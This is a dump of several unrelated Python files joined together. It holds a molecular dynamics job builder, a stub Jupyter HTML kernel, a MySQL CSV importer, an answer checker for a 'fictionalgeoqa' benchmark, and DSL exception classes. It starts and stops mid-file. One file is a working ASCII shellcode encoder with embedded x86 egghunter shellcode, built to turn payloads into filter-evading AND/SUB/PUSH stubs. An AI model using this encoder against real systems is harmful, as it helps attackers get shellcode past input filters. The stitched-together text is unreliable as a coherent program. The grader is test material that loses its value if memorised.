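    #   sim.add_production_step(simulation_time=100.0)
    #   sim.run(arc=3, cores=32)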
def add_minimisation_step(
self,
steepest_descent_steps: int = 2500,
conjugate_gradient_steps: int = 2500,
nb_cutoff: float = 9.0,
restraints: Union[str, tuple] = ('protein', 1),
md_input: MinimisationInput = None,
quiet=False):
'''Adds a minimisation step to the simulation.
Parameters
----------
steepest_descent_steps : int, optional
Number of steepest descent minimisation steps to perform.
conjugate_gradient_steps : int, optional
Number of conjugate gradient minimisation steps to perform.
nb_cutoff : float, optional
The non-bonded interaction cutoff limit in Angstroms.
restraints : str or tuple, optional
            Add restraints to either the entire protein, e.g. restraints =
            ("protein", 1), or to the residues defined by a length 2 tuple,
            e.g. restraints = ((1, 500), 1). The second element of the tuple
            is the restraint weight in kcal/mol.
md_input : MinimisationInput, optional
Overrides all other parameters and instead uses a MinimisationInput
instance.
'''
# If no md_input provided, build one from the key word arguments
if md_input is None:
if not quiet:
logger.info('Adding minimisation step: steepest_descent_steps='
f'{steepest_descent_steps}, conjugate_gradient_steps='
f'{conjugate_gradient_steps}, nb_cutoff={nb_cutoff} An'
f"gstroms, restraints='{restraints}'")
kwargs = {}
kwargs['ncyc'] = steepest_descent_steps
kwargs['maxcyc'] = steepest_descent_steps + conjugate_gradient_steps
kwargs['cut'] = nb_cutoff
# If restraints are given process them into MDInput compatible
# argument
if restraints is not None:
posres = self._restraints_from_arg(restraints)
# If 'protein' is given as the restraint argument, but this
# class has been made directly (with Simulation() rather than
# Experiment()) and therefore doesn't have a protein_termini
# attribute, posres will be None so do not set protein
# restraints
if posres is not None:
kwargs['posres'] = posres
# Add a MinimisationInput object to the simulation using the key
# word arguments
md_input = MinimisationInput(**kwargs)
self.md_steps.append(md_input)
self.completed_steps.append(0)
# If Minimisation object is provided just add that
elif isinstance(md_input, MinimisationInput):
self.md_steps.append(md_input)
self.completed_steps.append(0)
if not quiet:
logger.info('Adding minimisation step from MinimisationInput')
else:
raise Exception('md_input must be an instance of the MinimisationInput class or None')
if not quiet:
logger.debug(f'Minimisation flags: {md_input.arg_dict}')
def add_equilibration_step(
self,
initial_temperature: float = 0.0,
target_temperature: float = 310.0,
nb_cutoff: float = 9.0,
simulation_time: float = 125.0,
restraints: Union[str, tuple] = ('protein', 1),
md_input: EquilibrationInput = None,
quiet=False):
'''Adds a equilibration step to the simulation.
Parameters
----------
        initial_temperature : float, optional
Initial temperature to start equilibration in Kelvin.
target_temperature : float, optional
Target temperature to reach by the end of the simulation in Kelvin.
nb_cutoff : float, optional
The non-bonded interaction cutoff limit in Angstroms.
simulation_time : float, optional
Total MD simulation_time for the equilibration step in picoseconds.
restraints : str or tuple, optional
            Add restraints to either the entire protein, e.g. restraints =
            ("protein", 1), or to the residues defined by a length 2 tuple,
            e.g. restraints = ((1, 500), 1). The second element of the tuple
            is the restraint weight in kcal/mol.
md_input : EquilibrationInput, optional
Overrides all other arguments and instead uses an EquilibrationInput
instance.
'''
# If no md_input provided, build one from the key word arguments
if md_input is None:
if not quiet:
                logger.info('Adding equilibration step: initial_temperature='
f'{initial_temperature}K, target_temperature='
f'{target_temperature}K, nb_cutoff={nb_cutoff} Angstro'
f'ms, simulation_time={simulation_time}ps, restraints='
f"'{restraints}'")
kwargs = {}
kwargs['tempi'] = initial_temperature
kwargs['temp0'] = target_temperature
kwargs['cut'] = nb_cutoff
kwargs['dt'] = 0.001
kwargs['nstlim'] = int(simulation_time/kwargs['dt'])
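            # e.g. (illustrative): the default simulation_time of 125.0 ps with
            # dt = 0.001 ps gives nstlim = 125000 steps.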
# If restraints are given process them into MDInput compatible
# argument
if restraints is not None:
posres = self._restraints_from_arg(restraints)
# If 'protein' is given as the restraint argument, but this
# class has been made directly (with Simulation() rather than
# Experiment()) and therefore doesn't have a protein_termini
# attribute, posres will be None so do not set protein
# restraints
if posres is not None:
kwargs['posres'] = posres
# Add a EquilibrationInput object to the simulation using the key
# word arguments
md_input = EquilibrationInput(**kwargs)
self.md_steps.append(md_input)
self.completed_steps.append(0)
# If Equilibration object is provided just add that
elif isinstance(md_input, EquilibrationInput):
self.md_steps.append(md_input)
self.completed_steps.append(0)
if not quiet:
logger.info('Adding equilibration step from EquilibrationInput')
else:
raise Exception('md_input must be an instance of the EquilibrationInput class or None')
if not quiet:
logger.debug(f'Equilibration flags: {md_input.arg_dict}')
def add_production_step(
self,
timestep: float = 0.004,
target_temperature: float = 310.0,
nb_cutoff: float = 9.0,
simulation_time: float = 100.0,
save_frame_frequency: int = 25000,
restraints: Union[str, tuple] = None,
md_input: ProductionInput = None,
quiet=False
):
'''Adds a Production step to the simulation.
Parameters
----------
timestep : float, optional
The integrator timestep to be used in the simulation. If hydrogen
mass repartitioning is used, set this to 0.004, otherwise set to
0.002 (provided that SHAKE is not turned off manually).
target_temperature : float, optional
Target temperature to be kept at in Kelvin.
nb_cutoff : float, optional
The non-bonded interaction cutoff limit in Angstroms.
simulation_time : float, optional
            Total MD simulation_time for the production step in nanoseconds.
        save_frame_frequency : int, optional
            Write coordinates to the trajectory every this many steps (ntwx).
        restraints : tuple, optional
            Positional restraints in the same format as for
            add_minimisation_step.
        md_input : ProductionInput, optional
            Overrides all other arguments and instead uses a ProductionInput
            instance.
'''
# If no md_input provided, build one from the key word arguments
if md_input is None:
if not quiet:
logger.info('Adding production step: target_temperature='
f'{target_temperature}K, nb_cutoff={nb_cutoff} Angstro'
f'ms, simulation_time={simulation_time}ns')
kwargs = {}
kwargs['dt'] = timestep
kwargs['cut'] = nb_cutoff
kwargs['nstlim'] = int((1000*simulation_time)/kwargs['dt'])
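            # e.g. (illustrative): simulation_time = 100.0 ns with dt = 0.004 ps
            # gives nstlim = int(100000 / 0.004) = 25000000 steps.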
kwargs['temp0'] = target_temperature
kwargs['ntwx'] = save_frame_frequency
# If restraints are given process them into MDInput compatible
# argument
if restraints is not None:
posres = self._restraints_from_arg(restraints)
# If 'protein' is given as the restraint argument, but this
# class has been made directly (with Simulation() rather than
# Experiment()) and therefore doesn't have a protein_termini
# attribute, posres will be None so do not set protein
# restraints
if posres is not None:
kwargs['posres'] = posres
# Add a ProductionInput object to the simulation using the key
# word arguments
md_input = ProductionInput(**kwargs)
self.md_steps.append(md_input)
self.completed_steps.append(0)
# If Production object is provided just add that
elif isinstance(md_input, ProductionInput):
self.md_steps.append(md_input)
self.completed_steps.append(0)
else:
raise Exception('md_input must be an instance of the ProductionInput class or None')
if not quiet:
logger.debug(f'Production flags: {md_input.arg_dict}')
def run(self,
arc = 3,
cores = 32
):
'''Writes the mdin files and runs the simulation using crossbow.
Parameters
----------
arc : int, optional
The Arc HPC cluster you want to perform the simulations on. Can be
3 or 4. The default is 3.
cores : int, default=32
The number of cores to use for minimisation (if minimisation is
used).
'''
# Longbow doesn't like absolute paths so get the basenames of the
# input files
parm7 = os.path.basename(self.parm7)
rst7 = os.path.basename(self.rst7)
ref_rst7 = os.path.basename(self.ref_rst7)
# Iterate through md steps and get step number (i)
for step_number, md_step in enumerate(self.md_steps):
# Create a key word argument dictionary for crossbow and add
# kwargs
kwargs = {}
kwargs['arc'] = arc
kwargs['localworkdir'] = self.simulation_directory
step_number += 1
step_name = md_step.__str__()
if step_name == 'production':
kwargs['stagingfrequency'] = 3600
attempt_number = 0
while True:
# File name will contain the step number (based on order in
# md_steps) and the name of the input object. The prefix here is
# used by longbow to automatically generate all of the output file
# names
fname = f'step-{step_number}.{attempt_number}-{step_name}.mdin'
if step_name == 'minimisation':
kwargs['minimisation'] = True
kwargs['cores'] = cores
else:
self.trajectories.append(os.path.join(self.simulation_directory, fname.replace('mdin', 'nc')))
# If step is not completed
if self.completed_steps[step_number-1] == 0:
md_step.write(self.simulation_directory, fname)
# Get the name for the job from the simulation name, step name, and
# step number
job_name = self.name + '.' + step_name[:3] + '.' + str(step_number) + '.' + str(attempt_number)
self.md_job_names.append(job_name)
# Get the positional arguments in a tuple. The positional arguments
# for crossbow are (name, user, mdin, parm7, rst7, ref_rst7)
args = (job_name, fname, parm7, rst7, ref_rst7)
if step_number != 1:
kwargs['hold_jid'] = self.md_job_names[step_number+attempt_number-2]
if self.completed_steps[step_number-1] == 0:
error_code = run_pmemd(*args, **kwargs)
if error_code == 0:
rst7 = f'step-{step_number}.{attempt_number}-{step_name}.rst7'
self.completed_steps[step_number-1] = 1
break
elif error_code == 1:
rst7 = f'step-{step_number}.{attempt_number}-{step_name}.rst7'
attempt_number += 1
self.completed_steps.append(0)
continue
elif error_code == 2:
self.run(arc, cores)
else:
rst7 = f'step-{step_number}.{attempt_number}-{step_name}.rst7'
break
else:
break
def remove_last_step(self):
# Set attributes
self.md_steps = self.md_steps[:-1]
self.md_inputs = self.md_inputs[:-1]
self.md_job_names = self.md_job_names[:-1]
self.trajectories = self.trajectories[:-1]
self.completed_steps = self.completed_steps[:-1]
def _restraints_from_arg(self, arg):
'''Converts restraints from argument to posres MDInput argument.
        If the argument cannot be converted to a valid posres argument, an
        exception is raised.
Parameters
----------
arg
Restraint argument passed to method.
Returns
-------
restraints : tuple
MDInput object posres parameter.
'''
try:
residues, weight = arg
        except (TypeError, ValueError):
raise Exception('Posres argument must be a length 2 tuple')
if residues == 'protein':
try:
residues = self.protein_termini
except:
return None
elif type(residues) is tuple:
if len(residues) != 2:
raise Exception(f'Protein restraint tuple must be length 2, not {len(residues)}')
else:
if type(residues) is list:
for residue in residues:
if len(residue) != 2:
raise Exception(f'Protein restraint tuple must be length 2, not {len(residue)}')
else:
raise Exception(f'Restraint argument can either be "protein" or tuple, not {type(residues)}')
return (residues, weight)
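    # Illustrative conversions (assumed inputs, not from the original module):
    #   ('protein', 1)             -> (self.protein_termini, 1) if the
    #                                 protein_termini attribute exists,
    #                                 otherwise None
    #   ((1, 500), 1)              -> ((1, 500), 1)
    #   ([(1, 50), (60, 120)], 10) -> ([(1, 50), (60, 120)], 10)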
|
<gh_stars>0
##//%file:kernel.py
#
# MyHtml Jupyter Kernel
#
from math import exp
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
from pexpect import replwrap, EOF
from jinja2 import Environment, PackageLoader, select_autoescape,Template
from abc import ABCMeta, abstractmethod
from typing import List, Dict, Tuple, Sequence
from shutil import copyfile,move
from urllib.request import urlopen
import socket
import copy
import mmap
import contextlib
import atexit
import platform
import base64
import urllib.request
import urllib.parse
import pexpect
import signal
import typing
import typing as t
import re
import subprocess
import tempfile
import os
import stat
import sys
import traceback
import os.path as path
import codecs
import time
import importlib
import importlib.util
import inspect
from . import ipynbfile
from plugins import ISpecialID
# from plugins.ISpecialID import IStag,IDtag,IBtag,ITag,ICodePreproc
from plugins._filter2_magics import Magics
from .Mymacroprocessor import Mymacroprocessor
try:
zerorpc=__import__("zerorpc")
# import zerorpc
except:
pass
fcntl = None
msvcrt = None
bLinux = True
if platform.system() != 'Windows':
fcntl = __import__("fcntl")
bLinux = True
else:
msvcrt = __import__('msvcrt')
bLinux = False
from .MyKernel import MyKernel
class MyHtmlKernel(MyKernel):
implementation = 'jupyter-MyHtml-kernel'
implementation_version = '1.0'
language = 'html'
language_version = ''
language_info = {'name': 'html',
'version': sys.version.split()[0],
'mimetype': 'text/html',
'codemirror_mode': {
'name': 'ipython',
'version': sys.version_info[0]
},
'pygments_lexer': 'ipython%d' % 3,
'nbconvert_exporter': 'python',
'file_extension': '.html'}
runfiletype='script'
banner = "MyHtml kernel.\n" \
"creates source code files and executables in temporary folder.\n"
kernelinfo="[MyHtml]"
main_head = "\n" \
"\n" \
"int main(List<String> arguments){\n"
main_foot = "\nreturn 0;\n}"
##//%include:src/comm_attribute.py
def __init__(self, *args, **kwargs):
super(MyHtmlKernel, self).__init__(*args, **kwargs)
self.runfiletype='script'
self.kernelinfo="[MyHtmlKernel{0}]".format(time.strftime("%H%M%S", time.localtime()))
#################
##do_runcode
def do_runcode(self,return_code,file_name,magics,code, silent, store_history=True,
user_expressions=None, allow_stdin=True):
return_code=return_code
file_name=file_name
bcancel_exec=False
retinfo=self.mymagics.get_retinfo()
retstr=''
        ## before the code runs
for line in code.splitlines():
self.mymagics._write_to_stdout(line,magics)
        ## after the code has started
return_code=0
        ## after the code run finishes
if return_code != 0:
self.mymagics._log("Executable exited with code {}".format(return_code),2)
return bcancel_exec,retinfo,magics, code,file_name,retstr
##do_compile_code
def do_compile_code(self,return_code,file_name,magics,code, silent, store_history=True,
user_expressions=None, allow_stdin=True):
return_code=0
file_name=file_name
sourcefilename=file_name
bcancel_exec=False
retinfo=self.mymagics.get_retinfo()
retstr=''
return bcancel_exec,retinfo,magics, code,file_name,retstr
##do_create_codefile
def do_create_codefile(self,magics,code, silent, store_history=True,
user_expressions=None, allow_stdin=True):
return_code=0
file_name=''
bcancel_exec=False
retinfo=self.mymagics.get_retinfo()
retstr=''
source_file=self.mymagics.create_codetemp_file(magics,code,suffix='.html')
newsrcfilename=source_file.name
file_name=newsrcfilename
return_code=True
return bcancel_exec,self.mymagics.get_retinfo(),magics, code,file_name,retstr
##do_preexecute
def do_preexecute(self,code,magics,silent, store_history=True,
user_expressions=None, allow_stdin=False):
bcancel_exec=False
retinfo=self.mymagics.get_retinfo()
return bcancel_exec,retinfo,magics, code
|
import json
import mysql.connector
from mysql.connector import errorcode
import csv
from datetime import datetime
#get configuration settings from config.json
with open('config.json') as json_data_file:
data = json.load(json_data_file)
#print(data)
#print("host:"+data["mysql"]["host"])
host = data["mysql"]["host"]
user = data["mysql"]["user"]
passwd = data["mysql"]["passwd"]
db = data["mysql"]["db"]
table = data["table"]
filecsv = data["csv"]
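#Illustrative example of the expected config.json layout (inferred from the
#keys read above; the values shown here are hypothetical):
#{
#    "mysql": {"host": "localhost", "user": "me", "passwd": "secret", "db": "mydb"},
#    "table": "financials",
#    "csv": "annual-bs.csv",
#    "fields": [
#        {"name": "findate", "fieldasdate": "%m/%d/%Y"},
#        {"name": "revenue"}
#    ]
#}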
try:
#establish connection
connection = mysql.connector.connect(host=host, user=user, password=passwd, database=db)
#create a cursor
mycursor = connection.cursor()
#build sql string******
sql = ""
strInsertFld = ""
strInsertPlaceHld = ""
listInsertVal = list()
listFieldFormat = list()
listFieldAsDate = list()
i = 0
for x in data["fields"]:
#going thru getting fields info from config (to see if there are any format consideration)
strField = x["name"]
#getting optional fields
strFormat = ""
strFieldAsDate = ""
##strFieldAsDate is used to store value from "fieldasdate" attribute coming from config.json
##"fieldasdate" indicates the field will be converted to a date field (instead of text) when inserted into MySql
        ##If the MySQL field storing the csv value is a date field, then the csv value needs to be converted to a date (if the MySQL field is text/char, nothing needs to be done)...
##do this by identifying the date format that the csv field is using
##"fieldasdate" in config.json is the date format the csv field represents, see file "strptimeDateFormatCodes.txt" for proper Date Format codes for "fieldasdate"
##example 1, if the value of the "findate" field in "annual-bs.csv" is something like "12/31/2008"...
##and the user wants to import this into a MYSQL date field, then config.json needs to have:
##{"name":"findate", "fieldasdate":"%m/%d/%Y"}
if "format" in x:
strFormat = x["format"]
if "fieldasdate" in x:
strFieldAsDate = x["fieldasdate"]
listFieldFormat.append(strFormat)
listFieldAsDate.append(strFieldAsDate)
#print("field:" + strField + " format:" + strFormat)
if strInsertFld == "":
strInsertFld = strField
strInsertPlaceHld = "%s"
else:
strInsertFld += ", " + strField
strInsertPlaceHld += ", " + "%s"
#INSERT statement header & placeholder
strInsertFld = "(" + strInsertFld + ")"
strInsertPlaceHld = "(" + strInsertPlaceHld + ")"
#test
#strInsertPlaceHld = "(%s, %s, %s, %s, %s, %s, %s, %s)"
sql = "INSERT IGNORE INTO " + table + " " + strInsertFld + " VALUES " + strInsertPlaceHld + " "
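    #e.g. (illustrative, with hypothetical table/field names): for fields
    #"findate" and "revenue" and table "financials" this builds
    #"INSERT IGNORE INTO financials (findate, revenue) VALUES (%s, %s) "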
#loop csv file and build list of values (listInsertVal) for all fields in each row
#placeholders (%s) used for parameters will ensure sql injection is taken care of
    #although with this script, there is not a lot of worry about injection because there are no user inputs to worry about
with open(filecsv) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
#skip first line
line_count += 1
else:
#loop thru each field from each record, build values to insert into db
i = 0
end = len(row)
while i < end:
val = row[i]
#for handling custom format of the fields, add code here**
#if listFieldFormat[i] != "":
#for storing the field as a date field (MySql Date field will store any date as YYYY-MM-DD)
#here specify the date format the csv field is using (strptime 2nd parameter) if the MySQL field storing this value is a date field
#see file "strptimeDateFormatCodes.txt" for proper Date Format codes
if listFieldAsDate[i] != "":
val = datetime.strptime(val, listFieldAsDate[i])
#add to list of values (Python list) to be included in INSERT statement
listInsertVal.append(val)
i += 1
#execute the INSERT statement
mycursor.execute(sql, listInsertVal)
listInsertVal.clear() #clear items from list, to prepare for next iteration of values
line_count += 1
#ends csv loop
#commit inserts to DB
connection.commit()
print(str(line_count) + " records inserted.")
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
#quit script
exit()
else:
#run after try completed w/o errors
connection.close()
|
#!/usr/bin/env python3
################################################################################
# INTRODUCTION
################################################################################
# Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH
# Date: 26.6.2019
# Encoder Author: <NAME>, www.mmquant.net
# Tested on: Linux ubuntu 3.13.0-32-generic, x86
# Special thx to: Corelanc0d3r for intro to this technique
#
# Description:
# This encoder is based on egghunter found in https://www.exploit-db.com/exploits/5342
# Core idea is that every dword can be derived using 3 SUB instructions
# with operands consisting strictly of ASCII compatible bytes.
#
# What it does?:
# Suppose that we want to push \x05\xEB\xD1\x8B (0x8BD1EB05) to the stack.
# Then we can do it as follows:
#
# AND EAX, 3F465456
# AND EAX, 40392B29 ; Two AND instructions zero EAX
# SUB EAX, 3E716230 ; Subtracting 3 dwords consisting
# SUB EAX, 5D455523 ; of ASCII compatible bytes from 0x00000000
# SUB EAX, 5E5D7722 ; we get EAX = 0x8BD1EB05
# PUSH EAX
# Mandatory bytes:
# \x25 AND EAX, imm32
# \x2d SUB EAX, imm32
# \x50 PUSH EAX
# \x61 POPAD
# How to use:
# Edit the SETTINGS section and simply run as
# ./ASCIIencoder
# ProTip:
# Take special attention to the memory between the end of decoder instructions
# and the beginning of decoded shellcode. Program flow must seamlessly step over
# this memory. If this "bridge memory area" contains illegal opcodes they can
# be rewritten with additional PUSH instruction appended to the end of generated
# shellcode. Use for example PUSH 0x41414141.
################################################################################
import itertools
import struct
import random
import sys
assert sys.version_info >= (3, 6)
################################################################################
# CONSTANTS - no changes needed here
################################################################################
# ASCII character set
L_CASE = bytearray(range(0x61, 0x7b)) # abcdefghijklmnopqrstuvwxyz
U_CASE = bytearray(range(0x41, 0x5b)) # ABCDEFGHIJKLMNOPQRSTUVWXYZ
NUMBERS = bytearray(range(0x30, 0x3a)) # 0123456789
SPECIAL_CHARS = bytearray(
itertools.chain(
range(0x21, 0x30), # !"#$%&\'()*+,-.
range(0x3a, 0x41), # :;<=>?
range(0x5b, 0x61), # [\\]^_
range(0x7b, 0x7f) # {|}
)
)
ASCII_NOPS = b'\x41\x42\x43\x44' # and many more
ALL_CHARS = (L_CASE + U_CASE + NUMBERS + SPECIAL_CHARS)
################################################################################
# SETTINGS - enter shellcode, select character set and bad chars
################################################################################
input_shellcode = (
b'\x8b\xd1\xeb\x05\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e'
b'\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf'
b'\x75\xe7\xff\xe7'
)
# input_charset = U_CASE + L_CASE
input_charset = ALL_CHARS
# badchars = b''
badchars = b''
nops = ASCII_NOPS
################################################################################
# CORE - no changes needed here
################################################################################
class ASCII_Encoder(object):
def __init__(self, shellcode_, charset_, badchars_, nops_):
# Constructor args
self.shellcode = bytearray(shellcode_)
self.charset = charset_
self.badchars = badchars_
self.nops = nops_
# Private vars
self.encoded_dwords = []
self.twos_comps = []
self.sub_operands = []
self.payload = bytearray()
def encode(self):
self.align_to_dwords()
self.remove_badchars()
self.derive_dwords_sub()
self.compensate_overflow()
self.derived_dwords_to_sub_operands()
self.twos_comp_check()
self.compile_payload()
def align_to_dwords(self):
# Input shellcode alignment to dword multiples
nop = b'\x90'
pad_count = 4 - (len(self.shellcode) % 4)
if 0 < pad_count < 4:
self.shellcode += nop * pad_count
def remove_badchars(self):
for badchar in self.badchars:
self.charset = self.charset.replace(bytes([badchar]), b'')
self.nops = self.nops.replace(bytes([badchar]), b'')
def derive_dwords_sub(self):
def get_sub_encoding_bytes(target):
"""
Select bytes x, y, z from the allowed character set such that x + y + z == target.
For each candidate pair (x, y) the remainder is z = target - (x + y), e.g.
0x100 - (0x21 + 0x21) = 0xbe; a candidate is kept only if z is also an allowed,
non-badchar byte.
"""
# Get all possible solutions
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
z = target - (x + y)
# Get only bytes which are ASCII and non-badchar
if (0 < z < 256) and (z in self.charset):
results.append({
'x': x,
'y': y,
'z': z,
'of': True if target >= 0x100 else False
})
# Choose random solution
return random.choice(results)
for dword in struct.iter_unpack('<L', self.shellcode):
# 32-bit 2's complement
twos_comp = (dword[0] ^ 0xffffffff) + 1
self.twos_comps.append(twos_comp)
encoded_block = []
for byte_ in struct.pack('>L', twos_comp):
# Will overflow be used when calculating this byte using 3 SUB instructions?
if byte_ / 3 < min(self.charset):
byte_ += 0x100
encoded_block.append(
get_sub_encoding_bytes(byte_))
self.encoded_dwords.append(encoded_block)
def compensate_overflow(self):
# If the neighboring lower byte overflowed, subtract 1 from max(x, y, z)
for dword in self.encoded_dwords:
for solution, next_solution in zip(dword, dword[1:]):
if next_solution['of']:
max_value_key = max(solution, key=solution.get)
solution[max_value_key] -= 1
def derived_dwords_to_sub_operands(self):
for dword in self.encoded_dwords:
sub_operand_0 = struct.pack('<BBBB',
*[solution['x'] for solution in dword])
sub_operand_1 = struct.pack('<BBBB',
*[solution['y'] for solution in dword])
sub_operand_2 = struct.pack('<BBBB',
*[solution['z'] for solution in dword])
self.sub_operands.append([
sub_operand_0,
sub_operand_1,
sub_operand_2
])
def twos_comp_check(self):
# Check that the calculated SUB operands sum to the 2's complement of each dword
for twos_comp, sub_operand in zip(self.twos_comps, self.sub_operands):
sup_operand_sum = sum(
[int.from_bytes(dw, byteorder='big') for dw in sub_operand])
# Correction of sum if there is overflow on the highest byte
if sup_operand_sum > 0xffffffff:
sup_operand_sum -= 0x100000000
assert (twos_comp == sup_operand_sum)
def compile_payload(self):
def derive_bytes_and():
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
if x + y == 127:
results.append((x, y))
while 1:
yield random.choice(results)
def derive_dwords_and():
gen_bytes = derive_bytes_and()
bytes_ = []
for _ in range(0, 4):
bytes_.append(next(gen_bytes))
return bytes_
# POPAD n times to adjust ESP.
# Decoded shellcode must be written after the decoder stub
self.payload += b'\x61' * (len(self.encoded_dwords))
for sub_operand in reversed(self.sub_operands):
# Clearing EAX instructions with AND instructions
bytes_ = derive_dwords_and()
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[0] for byte_ in bytes_])
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[1] for byte_ in bytes_])
# Encoded shellcode with SUB instructions
self.payload += b'\x2d' + sub_operand[0][::-1]
self.payload += b'\x2d' + sub_operand[1][::-1]
self.payload += b'\x2d' + sub_operand[2][::-1]
# Push EAX
self.payload += b'\x50'
# Pad with NOPs
self.payload += bytes(random.choices(self.nops, k=9))
def print_payload(self):
print('Original payload length: {}'.format(len(input_shellcode)))
print('Encoded payload length: {}'.format(len(self.payload)))
print('hex: ',
'\\x' + '\\x'.join('{:02x}'.format(byte) for byte in self.payload))
if __name__ == '__main__':
encoder = ASCII_Encoder(input_shellcode, input_charset, badchars, nops)
encoder.encode()
encoder.print_payload()
|
<filename>check_fictionalgeoqa_answers.py
import json
import sys
import re
def test_candidate(candidate, actual_answers):
candidates = [candidate]
if not candidate.startswith('river') and not candidate.endswith('river'):
candidates.append(candidate + ' river')
candidates.append('river ' + candidate)
for c in candidates:
try:
actual_answers.remove(c)
return True
except ValueError:
pass
return False
if len(sys.argv) < 2:
print("check_fictionalgeoqa_answers [answers file]")
sys.exit(1)
try:
actual_file = open('fictionalgeoqa.jsonl')
predicted_file = open(sys.argv[1])
except IOError as e:
print(e)
sys.exit(1)
total = 0
correct = 0
correct_per_flag = {}
total_per_flag = {}
correct_per_flag_count = {}
total_per_flag_count = {}
while True:
actual_line = actual_file.readline()
predicted_line = predicted_file.readline()
if len(actual_line) == 0:
if len(predicted_line) != 0:
print("WARNING: There are more predictions than questions.")
break
predicted_answer = predicted_line
while True:
old_predicted_answer = predicted_answer
predicted_answer = predicted_answer.strip()
if len(predicted_answer) > 0 and predicted_answer[0] == '<':
predicted_answer = predicted_answer[1:]
if len(predicted_answer) > 0 and predicted_answer[-1] == '>':
predicted_answer = predicted_answer[:-1]
if len(predicted_answer) > 0 and predicted_answer[0] == '(':
predicted_answer = predicted_answer[1:]
if len(predicted_answer) > 0 and predicted_answer[-1] == ')':
predicted_answer = predicted_answer[:-1]
if len(predicted_answer) > 0 and predicted_answer[0] == '[':
predicted_answer = predicted_answer[1:]
if len(predicted_answer) > 0 and predicted_answer[-1] == ']':
predicted_answer = predicted_answer[:-1]
if predicted_answer == old_predicted_answer:
break
predicted_answer = predicted_answer.lower()
if predicted_answer == 'no answer' or predicted_answer == 'none' or predicted_answer == 'nothing' or predicted_answer == 'empty':
predicted_answer = ''
try:
example = json.loads(actual_line)
except:
print('Failed to parse JSON on line ' + str(total + 1))
raise
for question in example["questions"].values():
actual_answer = question["answer"]
if actual_answer == "":
actual_answers = []
else:
actual_answers = [x.lower().strip() for x in actual_answer.split(",")]
start = 0
next_index = 0
while next_index < len(predicted_answer):
index = predicted_answer.find(',', next_index)
if index != -1:
next_index = index + 1
else:
index = predicted_answer.find('.', next_index)
if index != -1:
next_index = index + 1
else:
index = predicted_answer.find('and', next_index)
if index != -1:
next_index = index + 3
else:
index = len(predicted_answer)
next_index = index
# check if predicted_answer[start:index] is a correct answer
candidate = predicted_answer[start:index].strip()
if test_candidate(candidate, actual_answers):
start = next_index
continue
if candidate.startswith('the ') and test_candidate(candidate[4:], actual_answers):
start = next_index
continue
elif candidate.startswith('a ') and test_candidate(candidate[2:], actual_answers):
start = next_index
continue
if "answer_templates" in question:
answer_templates = question["answer_templates"]
found_matching_template = False
for answer_template in answer_templates:
ans_index = answer_template.find('{0}')
start_re = '^' + answer_template[:ans_index].lower()
end_re = answer_template[(ans_index + 3):].lower() + r'\.?$'
if candidate.endswith('..'):
# specifically exclude answers that end in two periods (that may slip through since the answer template may already allow a period at the end)
continue
start_re_match = re.match(start_re, candidate)
end_re_match = re.search(end_re, candidate)
if start_re_match != None and end_re_match != None and test_candidate(candidate[start_re_match.span()[1]:end_re_match.span()[0]].lower(), actual_answers):
found_matching_template = True
break
if found_matching_template:
start = next_index
continue
if len(actual_answers) != 0:
# not all correct answers were predicted
print("[" + str(total + 1) + "] Predicted: '" + predicted_line.strip() + "', Actual: '" + actual_answer + "' INCORRECT")
elif start != len(predicted_answer):
# there are more predicted answers than actual answers
print("[" + str(total + 1) + "] Predicted: '" + predicted_line.strip() + "', Actual: '" + actual_answer + "' INCORRECT")
else:
print("[" + str(total + 1) + "] Predicted: '" + predicted_line.strip() + "', Actual: '" + actual_answer + "' CORRECT")
is_correct = (len(actual_answers) == 0 and start == len(predicted_answer))
if is_correct:
correct += 1
total += 1
flag_count = 0
if "data_subsets" in example:
flag_count = len(example["data_subsets"])
for flag in example["data_subsets"]:
if flag not in correct_per_flag:
correct_per_flag[flag] = 0
total_per_flag[flag] = 0
if is_correct:
correct_per_flag[flag] += 1
total_per_flag[flag] += 1
if flag_count not in correct_per_flag_count:
correct_per_flag_count[flag_count] = 0
total_per_flag_count[flag_count] = 0
if is_correct:
correct_per_flag_count[flag_count] += 1
total_per_flag_count[flag_count] += 1
print("Accuracy: " + str(correct) + "/" + str(total) + " = " + str(float(correct)/total))
for (flag, total_flag) in total_per_flag.items():
correct_flag = correct_per_flag[flag]
print("[" + flag + "] " + str(correct_flag) + "/" + str(total_flag) + " = " + str(float(correct_flag)/total_flag))
print("[all except " + flag + "] " + str(correct - correct_flag) + "/" + str(total - total_flag) + " = " + str(float(correct - correct_flag)/(total - total_flag)))
for (flag_count, total_flag) in sorted(total_per_flag_count.items()):
correct_flag = correct_per_flag_count[flag_count]
print("[" + str(flag_count) + " data_subsets] " + str(correct_flag) + "/" + str(total_flag) + " = " + str(float(correct_flag)/(total_flag)))
|
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class InternalFlowException(Exception):
pass
class ReturnException(InternalFlowException):
def __init__(self, value):
self._value = value
@property
def value(self):
return self._value
class BreakException(InternalFlowException):
pass
class ContinueException(InternalFlowException):
pass
class DslInvalidOperationError(Exception):
pass
class NoMethodFound(Exception):
def __init__(self, name):
super(NoMethodFound, self).__init__('Method "%s" is not found' % name)
class NoPropertyFound(Exception):
def __init__(self, name):
super(NoPropertyFound, self).__init__(
'Property "%s" is not found' % name)
class NoClassFound(Exception):
def __init__(self, name, packages=None):
if packages is None:
packages = []
